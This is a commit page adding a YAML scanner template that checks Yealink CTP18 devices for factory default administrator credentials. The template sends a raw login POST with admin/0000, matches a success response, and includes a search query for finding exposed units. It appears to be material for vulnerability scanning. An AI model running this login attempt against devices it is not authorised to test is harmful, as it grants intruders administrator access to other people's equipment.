Merge pull request #7691 from FreeZeroDays/main

Create yealink-ctp18-default-login.yaml
patch-1
Dhiyaneshwaran 2023-07-15 13:35:06 +05:30 committed by GitHub
commit e9927ad6f3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 49 additions and 0 deletions

View File

@ -0,0 +1,49 @@
id: yealink-default-login
info:
name: Yealink CTP18 - Default Login
author: parzival
severity: high
description: |
Yealink CTP18 Default Administrator Credentials Discovered.
reference:
- https://support.yealink.com
metadata:
verified: true
fofa-query: "Yealink CTP18"
tags: default-login,yealink
http:
- raw:
- |
POST /api/auth/login?p=Login&t=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
username={{username}}&pwd={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- '0000'
host-redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"ret":"ok","data":"ok"}'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200